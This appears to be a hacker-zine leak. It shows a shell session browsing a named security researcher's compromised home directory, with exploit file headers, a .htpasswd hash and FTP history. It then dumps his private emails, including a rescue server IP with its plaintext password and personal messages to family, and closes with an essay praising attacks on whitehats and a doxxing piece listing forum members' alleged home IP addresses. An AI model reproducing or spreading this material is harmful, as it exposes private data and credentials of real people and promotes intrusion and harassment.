drwx------ 7 titiweb titiweb	8192 2008-07-07 22:52 ..
-rwx------ 1 titiweb titiweb   15512 2008-07-08 11:51 bfssh-1.0.tgz
-rwx------ 1 titiweb titiweb	2536 2008-06-27 14:52 cr0.css
-rwx------ 1 titiweb titiweb	5253 2008-07-21 15:21 index.html
-rwx------ 1 titiweb titiweb  401891 2008-07-08 11:49 libssh-0.2.tgz
-rwx------ 1 titiweb titiweb 1463491 2008-07-08 11:51 libssl-vuln.tgz
-rwx------ 1 titiweb titiweb   16437 2008-07-08 16:47 ssh_decoder-1.0.tar.bz2
-rwx------ 1 titiweb titiweb 2538904 2008-07-08 16:47
ssh_kex_keygen-1.1.tar.bz2

./progs/ttytools:
total 40
drwx------ 3 titiweb titiweb 8192 2008-07-09 00:23 .
drwx------ 7 titiweb titiweb 8192 2008-07-07 22:52 ..
-rwx------ 1 titiweb titiweb 2536 2008-06-27 14:52 cr0.css
-rwx------ 1 titiweb titiweb 3340 2008-07-09 00:22 index.html
drwx------ 2 titiweb titiweb 8192 2008-07-08 20:14 sttybin

./progs/ttytools/sttybin:
total 40
drwx------ 2 titiweb titiweb  8192 2008-07-08 20:14 .
drwx------ 3 titiweb titiweb  8192 2008-07-09 00:23 ..
-rwx------ 1 titiweb titiweb	97 2008-07-08 20:14 .htaccess
-rwx------ 1 titiweb titiweb 10192 2008-07-09 00:05 subtty

./security-ca:
total 96
drwx------  2 titiweb titiweb  8192 2005-01-21 14:18 .
drwx------ 15 titiweb titiweb  8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  1055 2005-01-21 14:04 index.php
-rwx------  1 titiweb titiweb  2402 2005-01-21 14:18 README-security-CA
-rwx------  1 titiweb titiweb  2638 2005-01-21 17:03 README-security-CA.asc
-rwx------  1 titiweb titiweb  1828 2005-01-21 13:39 security-ca.asc
-rwx------  1 titiweb titiweb 37647 2005-01-21 13:40 security-ca-keyring.asc
-rwx------  1 titiweb titiweb	910 2005-01-21 13:05 style.css
titiweb@flint:/cr0$ cd stpocd bordel/
titiweb@flint:/cr0/bordel$ ls -la
total 84264
drwx------ 10 titiweb titiweb	  8192 2009-05-07 22:30 .
drwx------ 15 titiweb titiweb	  8192 2009-05-20 00:17 ..
drwx------  4 titiweb titiweb	  8192 2007-09-10 22:29 15_aout
-rwx------  1 titiweb titiweb  6751875 2004-11-09 19:23 1758.zip
drwx------  2 titiweb titiweb	  8192 2008-02-10 15:14 annivs
drwx------  3 titiweb titiweb	  8192 2009-03-08 01:12 Appart-mtv
-rwx------  1 titiweb titiweb	  2643 2004-11-12 11:02
binfmt_elf_partial_read_pax.patch
-rwx------  1 titiweb titiweb  9698361 2008-06-10 13:29
c3550-ipservicesk9-mz.122-44.SE.bin
drwx------  2 titiweb titiweb	  8192 2006-07-09 23:02 caves
-rwx------  1 titiweb titiweb	683160 2008-08-25 21:35 cuisine1.jpg
-rwx------  1 titiweb titiweb	636068 2008-08-25 21:32 cuisine2.jpg
-rwx------  1 titiweb titiweb	 59227 2005-01-22 15:08 cv.julien.tinnes.pdf
-rwx------  1 titiweb titiweb	889319 2005-11-01 01:18 doc.sof.tgz
-rwx------  1 titiweb titiweb	889558 2005-11-01 01:19 doc.sof.zip
-rwx------  1 titiweb titiweb	189930 2008-03-30 19:22 dollar.lol.jpg
-rwx------  1 titiweb titiweb	  1025 2004-08-20 23:27 endofmd5.pl
-rwx------  1 titiweb titiweb	   532 2008-01-26 12:29 etats.hds
-rwx------  1 titiweb titiweb	210931 2006-11-06 22:13 grosse-bete.jpg
-rwx------  1 titiweb titiweb	537644 2007-09-19 10:43 img_0306.jpg
-rwx------  1 titiweb titiweb  1101200 2007-11-27 21:15 img_4353.jpg
-rwx------  1 titiweb titiweb  1184202 2007-11-27 21:16 img_4355.jpg
-rwx------  1 titiweb titiweb	  2791 2009-05-07 00:06 impotscertif1.p12
-rwx------  1 titiweb titiweb	 71680 2008-06-10 14:34 jt-openssl2008.doc
-rwx------  1 titiweb titiweb	 99220 2006-05-19 16:31 jt-securitech-06-11.pdf
drwx------  2 titiweb titiweb	  8192 2006-06-24 20:30 juan
-rwx------  1 titiweb titiweb	  1043 2005-01-13 06:19
linux-2.4.28-CAN-2005-0001-grsec.patch
-rwx------  1 titiweb titiweb	    65 2005-01-16 12:51
linux-2.4.28-CAN-2005-0001-grsec.patch.sig
-rwx------  1 titiweb titiweb 26818560 2009-05-07 22:33 meder_filipe.tar
-rwx------  1 titiweb titiweb	   759 2004-01-07 00:11 mremap.2.4.22.patch
-rwx------  1 titiweb titiweb	   832 2004-02-18 13:50 mremap_newvuln.patch
-rwx------  1 titiweb titiweb	287867 2006-11-17 22:32 nuclear_polkka.swf
-rwx------  1 titiweb titiweb	 10864 2005-11-26 21:42 obsddtd.c
-rwx------  1 titiweb titiweb	 86354 2006-11-13 08:51 peur_dans_bouche_2.png
-rwx------  1 titiweb titiweb	 96211 2006-11-07 15:47 peur.dans.la.bouche.png
drwx------  2 titiweb titiweb	  8192 2006-05-27 11:47 ph
-rwx------  1 titiweb titiweb	244239 2006-05-27 11:55 ph-1.jpg
-rwx------  1 titiweb titiweb	116361 2005-11-26 23:39 plop.tgz
-rwx------  1 titiweb titiweb	  2800 2006-07-12 23:01 prctlpute.c
-rwx------  1 titiweb titiweb	 13315 2005-01-07 15:16 pwned.c
-rwx------  1 titiweb titiweb	 77412 2006-06-22 10:22 rc
-rwx------  1 titiweb titiweb	   165 2007-08-04 02:27 rideaux
-rwx------  1 titiweb titiweb	 77460 2006-06-22 10:20 rp
-rwx------  1 titiweb titiweb  6210655 2008-02-23 19:48 sarkozy.parisien.flv
-rwx------  1 titiweb titiweb  9772994 2004-09-12 20:01 Saumon1.avi
-rwx------  1 titiweb titiweb  7688524 2004-09-12 19:56 Saumon2.avi
-rwx------  1 titiweb titiweb	  1836 2004-04-21 18:46 setsockopt_detect.c
-rwx------  1 titiweb titiweb	  1969 2004-04-21 01:09 setsockopt_poc.c
-rwx------  1 titiweb titiweb	592771 2005-10-22 22:02 shot00001.png
-rwx------  1 titiweb titiweb  1440018 2005-10-22 21:58 shot00001.tga
-rwx------  1 titiweb titiweb	474215 2005-10-22 22:02 shot00002.png
-rwx------  1 titiweb titiweb  1440018 2005-10-22 21:59 shot00002.tga
drwx------  2 titiweb titiweb	  8192 2007-08-06 16:58 suicide
-rwx------  1 titiweb titiweb	  1424 2005-12-14 00:45 tcexevppoc.c
-rwx------  1 titiweb titiweb  5295334 2007-05-27 11:32
The.Pragmatic.Programmers.Programming.Ruby.2nd.pdf
-rwx------  1 titiweb titiweb	  8192 2005-01-08 00:26 TTsharefile
-rwx------  1 titiweb titiweb	 11580 2006-05-18 16:04 tweakcrc
drwx------  2 titiweb titiweb	  8192 2008-05-21 21:55 usa
-rwx------  1 titiweb titiweb	295606 2007-04-30 10:33 wii.hack.jpg
-rwx------  1 titiweb titiweb  1893567 2004-06-18 10:55 WinSSL_Wrap_v1_17.zip
titiweb@flint:/cr0/bordel$ chead -n 10 pwned.c 
/*
 *  pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE.
 *  it's not the best one, the ldt approach is definitively better.
 *  discovered may 2004. no longer private because lorian/cliph/ihaquer
 *  can lick my balls.
 *  (c) 2004 sd <sd@fucksheep.org>
 *  requieres cca 1gb on fs.
 */


titiweb@flint:/cr0/bordel$ ls -la *.c
-rwx------ 1 titiweb titiweb 10864 2005-11-26 21:42 obsddtd.c
-rwx------ 1 titiweb titiweb  2800 2006-07-12 23:01 prctlpute.c
-rwx------ 1 titiweb titiweb 13315 2005-01-07 15:16 pwned.c
-rwx------ 1 titiweb titiweb  1836 2004-04-21 18:46 setsockopt_detect.c
-rwx------ 1 titiweb titiweb  1969 2004-04-21 01:09 setsockopt_poc.c
-rwx------ 1 titiweb titiweb  1424 2005-12-14 00:45 tcexevppoc.c
titiweb@flint:/cr0/bordel$ head -n 10 obsddtd.c 
#include <stdio.h>
#include <sys/types.h>
#ifndef BSD_SOURCE
#include <stdint.h>
#endif
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>
titiweb@flint:/cr0/bordel$ head prctlpute.c -nprctlpute.c   prctlpute.c
1prctlpute.c 0prctlpute.c  prctlpute.

/* Linux >= 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 *  [PATCH] setuid core dump
 * 
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per
process,
 * user setable argument to PR_SET_DUMPABLE.
 * 
titiweb@flint:/cr0/bordel$ cat suicide/.htpasswd 
toto:URweIEHAX3dcI
titiweb@flint:/cr0/bordel$ cd 
titiweb@flint:$ ls -la
total 88
drwx------  8 titiweb titiweb  8192 2009-06-10 17:17 .
drwx------  3 titiweb titiweb  8192 2009-07-11 14:50 ..
drwx------  2 titiweb titiweb  8192 2003-08-02 15:26 acidcorp
-rwx------  1 titiweb titiweb  1801 2009-05-20 10:24 .bash_history
drwx------  2 titiweb titiweb  8192 2008-04-01 18:44 cgi-bin
drwx------ 15 titiweb titiweb  8192 2009-05-20 00:17 cr0
drwx------  2 titiweb titiweb  8192 2004-10-21 18:01 .lftp
drwx------  2 titiweb titiweb  8192 2008-10-14 11:03 .ssh
-rwx------  1 titiweb titiweb	  0 2008-07-08 19:56 .subttlog
-rwx------  1 titiweb titiweb 13036 2009-05-20 00:17 .viminfo
drwx------  2 titiweb titiweb  8192 2009-06-10 17:06 www
titiweb@flint:$ ls -la .lftp/
total 24
drwx------ 2 titiweb titiweb 8192 2004-10-21 18:01 .
drwx------ 8 titiweb titiweb 8192 2009-06-10 17:17 ..
-rwx------ 1 titiweb titiweb   84 2004-10-21 18:01 cwd_history
titiweb@flint:$ cat .lftp/pwcwd_history 
ftp://piaf@cr0.net     
1098378101:/home/piaf/DataRescue.IDA.Pro.v4.7.0.830.Standard-SSG
titiweb@flint:$ exit

/***********************************************************************
*
* You guys get how that hosting works, right?
*
* Time for some emails. There are some technical ones, and a lot of him 
* and his girl chatting.
*
* Julien has interesting chats with security people, potential employers
* (Google, ImmunitySec), and of course, his girlfriend
*
* For the French, we got translations from the other famous francophone 
* Julien: Julien Vanegue.
*
* Or we make much good use babelfish quality translation device, yes? :(
*
***********************************************************************/

From: Pierre BETOUIN <pbt@security-labs.org>
To: Julien TINNES <jt@cr0.org>
In-Reply-To: <200807222141.56298.jt@cr0.org>
Content-Type: text/plain;
  charset=ISO-8859-1;
  format=flowed;
  delsp=yes
Content-Transfer-Encoding: quoted-printable
Mime-Version: 1.0 (Apple Message framework v930.3)
Subject: =?ISO-8859-1?Q?Re:_Faire_de_la_s=E9curit=E9_chez_Apple?=
Date: Tue, 23 Dec 2008 21:28:22 +0100 
References: <200807211325.04148.jt@cr0.org>
<1C11851B-5F06-481D-A746-08976EA562F8@security-labs.org>
<200807222141.56298.jt@cr0.org>
X-Mailer: Apple Mail (2.930.3)
X-Country: FR,Proxad
X-Country: 79.99.164.17
X-Length: 4379
X-UID: 4499
X-KMail-Filtered: 869004
Status: RO
X-Status: RC
X-KMail-EncryptionState:  
X-KMail-SignatureState:  
X-KMail-MDN-Sent:  
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.1.5

Hello Julien,

J'ai entendu dire que tu =E9tais parti chez Google ? Tu es dans quel =20
pays ?
=C7a se passe bien, content de ton job ?
A+

Pierre

On Jul 22, 2008, at 9:41 PM, Julien TINNES wrote:

> On Monday 21 July 2008, you wrote:
>> Salut Julien,
>>
>> Est-ce que tu es bon au niveau du visa pour les US ? Ils sont devenus
>> vraiment
>> difficile =E0 obtenir, et c'est particuli=E8rement vrai depuis 1 an =20=

>> 1/2...
>> (ce sont des visa
>> H1B en g=E9n=E9ral).
>>
>
> Salut Pierre,
>
> en fait pour les USAs, il est en effet tr=E8s difficile d'obtenir un =20=

> visa, mais
> une condition n=E9cessaire est qu'une soci=E9t=E9 de sponsorise pour =
cela. =20
> Donc
> c'est un peu le probl=E8me de la poule et de l'oeuf :)
> En gros l'id=E9e ca serait =E9ventuellement de d=E9marrer en France =
pour =20
> partir aux
> US une fois le visa acquis.
>
>> Il y a beaucoup d'=E9quipes diff=E9rentes chez Apple o=F9 tu peux =
trouver =20
>> de
>> la
>> s=E9cu, mais celle qui pourrait t'int=E9resser le plus je pense est
>> CoreOS. Je ne
>> sais pas s'ils ouvrent des positions en ce moment, mais je peux
>> regarder en
>> interne et te tenir au courant si je vois qqch.
>
> Je veux bien, ca m'int=E9resse beaucoup. Tu es dans quelle =E9quipe, =
toi ?
>
>>
>> J'ai entendu dire que =E7a bougeait bcp chez FT/Orange en ce moment ?
>
> Oui, c'est simple en s=E9curit=E9 presque tout le monde s'en va.
>
>> Fais un tour aussi sur http://www.apple.com/jobs/us/pro/.
>
> J'avais regard=E9 et j'avais en effet vu une offre qui m'int=E9ressait. =
=20
> Cependant
> je ne sais pas trop comment ca marche pour postuler =E0 un job US =20
> depuis la
> France..
>
>>
>> Tu as pris contact avec des gens aussi chez Google ? Leurs recruteurs
>> sont tr=E8s
>> actifs, notamment sur LinkedIn... Ils cherchent aussi pour l'Irlande
>> ou la Suisse.
>
> Oui j'investigue la piste Google en parall=E8le, apparement maintenant =
=20
> en
> Europe, tout est en Suisse, ce qui ne me tentait pas trop.
>
>> Tu as des contacts avec K ? Il doit =EAtre pas mal au courant de ce =
qui
>> se fait aux
>> US aussi je pense.
>
> Il faudrait effectivement que je vois de ce cot=E9 l=E0 aussi.
>
> Merci pour les infos, et tiens moi au courant si tu tombes sur =20
> quelques chose!
>
> PS: sinon tu en es content de ton job chez Apple?
>
> --=20
> Julien TINNES
> http://www.cr0.org

From: =?iso-8859-1?Q?Fr=E9d=E9ric_VANNI=C8RE?= <f.vanniere@planet-work.com>
To: "Julien TINNES" <julien@cr0.org>
User-Agent: SquirrelMail/1.4.15
MIME-Version: 1.0
Content-Type: text/plain;
  charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
X-Country: 79.99.160.21,FR,Planet-Work,Planet-Work,Unknown
X-Country: 79.99.160.30
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.1.5
X-UID:

Salut,

Le serveur est en mode rescue :
   IP : 79.99.160.142
   mot de passe: tmp123

tu es sous une debian etch avec ce qu'il faut pour installer une ubuntu
La config de ton serveur (IPs, DNS ...) est dans configs/  et debootstrap
peut
installer une ubuntu.

Fred



Le Dim 14 décembre 2008 21:14, Julien TINNES a écrit :
>
>> Comme tous les autres serveurs. mais là ça foire et je regarderai en
>> début de semaine sur place. Une fois l'install terminée je pourrai
>> désactiver le boot PXE .
>
> Ahh donc en fait elle ne boote pas sur un kernel stocké localement mais
> sur un
> kernel stocké sur un serveur TFTP et du coup la elle ne boote pas du tout,
> c'est bien ca? :)
>
> Merci, et pense à te reposer un peu le WE! :)
>


--
Frédéric VANNIERE
Directeur Technique

PLANET-WORK
231 rue Saint-Honoré
75001 PARIS - FRANCE

From: Sami Koivu <sami.koivu@gmail.com>
To: Julien TINNES <julien@cr0.org>
Cc: jt@cr0.org
Content-Type: multipart/alternative;
  boundary=0015175cb85ab0a6380465708141
X-Country: US,Google
X-Country: 79.99.164.17
X-Length: 9198
X-UID: 4701
X-KMail-Filtered: 870471
Status: RO
X-Status: OC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
X-Bogosity: Unsure, tests=bogofilter, spamicity=0.500000, version=1.1.5

--0015175cb85ab0a6380465708141
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi Julien,

Wow, congrats! Nice job. :) Once the dust settles, I'd be interested in the
details of your exploit.

I would have to say, I am interested, yes. How would you feel about a 50-50
split? Or in case the amount is very small, I'm willing to give you the
bear's share so you can cover your expenses.

Seems very interesting! And congratulation on finding such a great
> amount on vulnerabilities.
>

Thanks. Some of them are minor issues, but the interesting bit is that the
mechanism of every single one is different from the others.

Cheers,
Sami

On Wed, Mar 18, 2009 at 11:24 PM, Julien TINNES <julien@cr0.org> wrote:

> Sami Koivu a =E9crit :
> > Hi Julien,
> >
> > Thanks for letting me know. And I don't think you need my permission to
> > exploit the vulnerability, but you have it. Good luck. :)
>
> Hey Sami,
>
> thanks for this! So my weaponized exploit worked very well and I won
> both the Safari and Firefox contest (with the same bug, but apparently
> it's not considered cheating).
>
> Unfortunately since the vulnerability has already been reported it
> doesn't strictly speaking qualify, but Tipping Point seems to still be
> interested to handle the disclosure of this bug from now on and to give
> some money for that.
>
> Would you be interested ? The amount would probably be around 5000 USD
> (maybe less because it's already disclosed).
> Basically it's free cash, it only means not talking about this bug
> before Apple patches it and ZDI releases an advisory.
> I would be perfectly happy with a smaller share than yours that would
> just cover my expenses here at CanSec, it's your bug :)
>
> I am not normally into "selling" exploits, but in this situation it's
> basically just free cash..
>
> Some infos about the contest:
> http://dvlabs.tippingpoint.com/blog/2009/02/25/pwn2own-2009
>
> Julien
>
> > As for privileged deserialization code, there's another bug (I have
> > about 5 unfixed vulnerabilities still open at sun) which allows just
> > that, but it's difficult to set up, only runs on windows, uses the
> > system classloader (I couldn't figure any way around this and thus
> > couldn't get my custom classloader exploit to work) and as a whole is a
> > lot less cleaner than the Calendar vuln.
> >
> > Might not be worthwhile, but if you're interested I can pass the detail=
s
> > to you.
>
> Seems very interesting! And congratulation on finding such a great
> amount on vulnerabilities.
>
> Cheers,
>
> Julien
>

/* Those guys sure had a lot to chat about, it kept going, that's a taste */

From: alexm <alexm@immunityinc.com>
Reply-To: alexm@immunityinc.com
User-Agent: Thunderbird 2.0.0.21 (X11/20090318)
MIME-Version: 1.0
To: alexm@immunityinc.com
CC: Julien TINNES <julien@cr0.org>,
 alex.mcgeorge@immunityinc.com,
 jt@cr0.org
Subject: Re: My e-mail address
References: <20090320192712.GA2528@cr0.org> <49C41DEE.8090801@immunityinc.com>
In-Reply-To: <49C41DEE.8090801@immunityinc.com>
X-Enigmail-Version: 0.95.0
Content-Type: text/plain;
  charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Country: US,TERRENAP DATA CENTERS
X-Country: 79.99.164.17
X-Length: 2391
X-UID: 4705
X-KMail-Filtered: 870475
Status: RO
X-Status: OC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000744, version=1.1.5

Julien,

So sorry, it was a long conference and Justin from Immunity was standing
right next to me when I was writing this e-mail, didn't mean to call you
by the wrong name :)

Cheers,
-AlexM

alexm wrote:
> Justin,
>
> Yes absolutely, I'll forward your information on to Dave and Justine.
>
> Cheers,
> -AlexM
>
> Julien TINNES wrote:
>
>> Hi Alex,
>>
>> here's my email address since I had no business card when we met on
Wednesday.
>> I'm the french guy who knows Kostya and Nicolas if you don't remember.
>>
>> It was nice meeting you
>>
>> Cheers,
>>
>> Julien
>>
>>
>
>

--
Alex McGeorge
Senior Security Researcher
Immunity, Inc

Date: Mon, 9 Mar 2009 21:49:09 +0100 
From: Julien TINNES <julien@cr0.org>
To: spender@grsecurity.net
Subject: Information leakage through /proc/pid/stat
Message-ID: <20090309204909.GA19624@cr0.org>
Mime-Version: 1.0
Content-Type: text/plain;
  charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.9i
X-Country: FR,Planet-Work
X-Country: 79.99.164.17
X-Length: 2258
X-UID: 4673
X-KMail-Filtered: 870443
Status: RO
X-Status: OAC
X-KMail-EncryptionState:  
X-KMail-SignatureState:  
X-KMail-MDN-Sent:  
X-Bogosity: Unsure, tests=bogofilter, spamicity=0.499639, version=1.1.5

Hi spender,

my collegue Tavis Ormandy found out that while recent Linux kernels will
blank /proc/pid/maps from other uids they forgot about /proc/pid/stat
that will leak out eip and esp (cf. ps -eo pid,esp,eip).

I thought grsecurity might be vulnerable as well, and indeed, it seems to be
the
case. It's a very minor same-uid information leak, but it also should be
an easy fix.

Otherwise, how are you ? It has been a long time without chatting with
you! Any chances you might come at CanSecWest this year? 

Cheers,

From: julien <julien@cr0.org>
User-Agent: Mozilla Thunderbird 1.0.7 (X11/20051013)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Theo de Raadt <deraadt@cvs.openbsd.org>
Subject: Re: [Security] Bypassing w^x on i386 through far ret
References: <200512202048.jBKKm9pT011406@cvs.openbsd.org>
In-Reply-To: <200512202048.jBKKm9pT011406@cvs.openbsd.org>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Theo de Raadt wrote:
> the guys working on fixing this are still busy doing so.  it's not
> the easiest thing to fix right.  but we have something being worked
> on..

Ok, thanks for the information.
I understand that you need quite heavy changes to fix this.

From: julien <julien@cr0.org>
User-Agent: Mozilla Thunderbird 1.0.7 (X11/20051013)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  pageexec@freemail.hu
Subject: OpenBSD to fix unbounded code segments in G/LDT
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hello pipacs,

while reviewing (censoring ;) my article about HIPS and address space
protection mecanisms, my company expressed concerns that OpenBSD team
might not be aware of the far ret issue and asked me to talk to them
about it.

I mailed Theo with a PoC, and I was surprised to see that he answered me
quickly, telling me that they were working on the issue.

So it may seem that they were unaware of it! However, when I told you
about this, you pointed me to an email you wrote after a Theo's
presentation where you were pointing out a lot of issues in W^X
approach, including the far ret issue.

So I don't know what to think about it. Maybe they never read this email
of yours (they might not read daily dave, I don't think they're very
friendly with immunity ;)

I thought they were staying on their position, but in fact, maybe
they're not even aware that they need a less privilege approach and  to
restrict mprotect as well..

Have you already discussed about this with them ?

In other words, in your opinion, do they have a knowledge problem, or a
 'personal' approach to "security"?

From: julien <julien@cr0.org>
User-Agent: Mozilla Thunderbird 1.0.2 (X11/20050404)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  sofia.mejia@cr0.org
Subject: Hi from Vegas!
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Coucou ma petite puce! 

Je suis actuellement en pleine conférence. Tout se passe super bien, le 
Caesar palace est vraimen impressionant.

C'est hallucinant de luxe de grandeur, etc... Les salles pour les conf	
sont absolument immenses.
Il y a des tas de trucs délicieux à manger partout, c'et vraiment super.


Je t'embrasse tres fort

Je t'aime

From: Julien TINNES <julien@cr0.org>
User-Agent: Thunderbird 2.0.0.19 (X11/20090105)
MIME-Version: 1.0
To: Brigitte <brigti@free.fr>
Subject: Re: Deux trois photos
References: <49B31C13.3070207@cr0.org>
<5094CADC40984BFBAE2C305E9A77621F@PCdeBrigitte>
In-Reply-To: <5094CADC40984BFBAE2C305E9A77621F@PCdeBrigitte>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

Brigitte a écrit :
> super apparte !!! avec un beau téléphone ... mais j'ose pas t'appeler de
> peur de te réveiller .
> Aujourd'hui on va au resto avec papi et maie et Claire pour fêter son
> annive .
> Tu vas nous manquer .
> j'espère que tu vas bien
> Gros gros bisous

Coucou maman!

Tu peux appeler maintenant si tu veux, je viens de rentrer!
Sinon appelle dimanche soir (pour vous), mais pas avant 20h si possible :)

Gros bisous!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Who can't fall for a guy who ends his emails with "Je t'aime" or "Gros bisous"
or "Ton petit canard"?

Cheers Julien!


                                           |
                                       \       /            _\/_
   Scene check                           .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     Stay on top but remain from the underground                    |

Here's a small excerpt from the latest Phrack, containing a couple of
interesting statements. Jesus this editor really needs an editor.

> We didn't get any news from the Underground since our last phrack issue,
> it means that one more time all the news reports are coming from
> friends of our's.

> It would be good if people who claim themself "underground" would send
> us their news...

> Is our underground dead? (apparently yes...)

Did you not see ZF04? 2l8? Geist? The underground is here. The news is getting
around, with or without you. (Shouts to the hardcore at 2l8, geist, h0no,
dikline, everyone who didn't want to be named, and everyone else)

This year is retro. Lots of hacks. Brings a warmth to our hearts. And pr0j3kt
m4yh3m is back, the kids have taken it up. It's probably temporary, and it
might just be the latest way for a bunch of people to try to get attention.
We'd like to hope that it is not just a fad, that some people are really 
behind it and genuinely want to exit the skiddie scene. If we can give one
piece of advice though, it's that even in pr0j3kt m4yh3m--nay, especially in
pr0j3kt m4yh3m, some targets are more worthy of your time than others. It's
a black and white world, where some white is worse than others and really
needs to be hit.

The other side of that is that some white is better than others. Even people
who thoroughly support the pr0j3kt will grudgingly acknowledge that there are
some whitehats that we don't need to despise and attack. One particular group
that we have trouble coming to terms with is hackers who moonlight as security
professionals. The worst kept secret in the scene is the huge prevalence of
underground characters who play whitehat during the day and hacker at night.
We can slag them all for deluding the scene for years and spreading rhetoric 
that contradicts their actions. But we won't, too much.

We aren't here to criticize. In many cases, we're talking about our betters
and/or our elders. We recognize your talent. You're good and you deserve to be
paid for your expertise. But we need some new kind of morality.  Maybe now it's
cool to hire blackhats, like a bribery thing. Pay a nice wage to a former
blackhat, for his skills not his leaks, and the scene will leave you alone
more. Buy two blackhats and we'll give you a free slurpee. This kind of
understanding could work as long as it is respectful: you and your hacker
cannot abuse the underground. Don't leak, don't kill our bugs, keep us a little
bit informed, let the hacker share his research with his friends. You gotta
give a little back to the scene, you know?  Everytime a blackhat moves up, it
hurts the scene. He loses valuable hacking time. He gets compensated, but we
don't, so we are a little bitter.  But that's the way it is. If you can hire
talent in a way that minimizes the damage to the scene, we can respect that. It
wouldn't be pr0j3kt m4yh3m anymore, it'd be Project Reality. We can save the
fury of pr0j3kt m4yh3m for those who do not comply and who pretend that the 
underground does not matter.

That goes for purebred whitehats too. If you have a (proper) blackhat friend,
that goes a long way to keeping you from ending up in one of these. Discuss 
techniques, offer advice, and never turn on him.
 
To all the new kids out there: learn to code really well. Knowing how to hack
pigeon holes you into doing security or admin work (and who really wants to do
admin work?). But if you can hack and code REALLY well, you have *many* more
options to explore. But the most important thing to remember is to hack and
have fun. Once you quit having fun with this, it's a job.  And that's not the
spirit of hacking at all. Not at all.
 
Maybe the scene is rebounding. Really, the only thing we can do is hack
together or not hack together. As long as we have the smarts to rm others and
not rm ourselves, let the good times roll.


                                           |
                                       \       /            _\/_
   blackhat-forums                       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     RAPE, MURDER!                                                  |
       It's just a shot away
         It's just a shot away


The black hat forums have been around for a long time.  This forum is one big shitfest
after another.  In some skiddie forums we find one or two people who are actually skilled
but in the case of blackhat forums there was not one member among them with the ability
to do anything.  The admins seem to be motivated by money and/or the hacker "image".  This
forum is nothing but a black hole of posturing, lying, and drama.  There is so much 
emphasis put on keeping things private and not publishing any exploits or helping the
security industry, yet your admins make deals with them to run their google ads and they
release tutorials and pdf's directly to all the security mailing lists and exploit sites.

If the members can't realize the hypocrisy that is being blatantly executed right in
front of their noses then they no longer deserve to exist.  In the course of the few 
years that zf0 has been 0wning and Rming skiddies and media whores a general trend has
started to emerge.  The underground scene is getting stronger and more organized with
greater team work and the public skiddie scene is slowly rotting itself into nothingness.
All of the major sites have been rm'ed to death and are no longer producing anything with 
quality information. A lot of this is directly related to death of rgod and lack of web 
based exploits being publicly released.  

Some LAME people of note are:

Aelphaeis_Mangarae - Lame ass never hacked shit, can't do shit.
RoMeO              - watch out photobucket "anti-sec" is cuming for your imagez!!
r0rkty             - Only person who still gives a shit about BHF.

In this article we have:

I.   ADMIN HOME IP's Sniffed US1ng tor 0dayz
II.  ADMIN HASHES FOR LULZ
III. Aelphaeis_Mangarae's GREEDY MONEY GRUBBING PM's and MAIL SPO0lz
IV.  r0rkty and RoMeO's Luv AFFAIRZ
V.   HACKLOG
VI.  BHF RMED
VII. CONCLUSION

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED                     ADMINS HOME IPS?!>!                    BHFOWNEDANDRMED
BHFOWNEDANDRMED            Fire UP NMAP AND NESSUS DBAUTOPWN++             BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

poh n0es!! sn1ffed using anti-t0r 0dayz BLACKHAT HOME IP ADDRS!!!!  
Feel fr33to soci4l deets from hosting pr0viDers:

webdevil  -------My Home IP-------> 62.150.15.26 
RoMeO     -------My Home IP-------> <Not listed, you can thank us later> 
RoMeO     -------My Home IP-------> <Not listed, no fed tipoffs from us> 
r0rkty    -------My Home IP-------> 85.240.130.19 
r0rkty    -------My Home IP-------> 85.240.136.102 
r0rkty    -------My Home IP-------> 85.240.133.11 
r0rkty    -------My Home IP-------> 85.240.135.199 
r0rkty    -------My Home IP-------> 85.240.142.6 
r0rkty    -------My Home IP-------> 85.240.132.171 
r0rkty    -------My Home IP-------> 85.240.128.155 
r0rkty    -------My Home IP-------> 85.240.145.32 
r0rkty    -------My Home IP-------> 85.240.131.218 
ParanoidE -------My Home IP-------> 190.200.48.7 
ParanoidE -------My Home IP-------> 190.73.229.212 
ParanoidE -------My Home IP-------> 190.73.240.169 
ParanoidE -------My Home IP-------> 190.200.46.58 
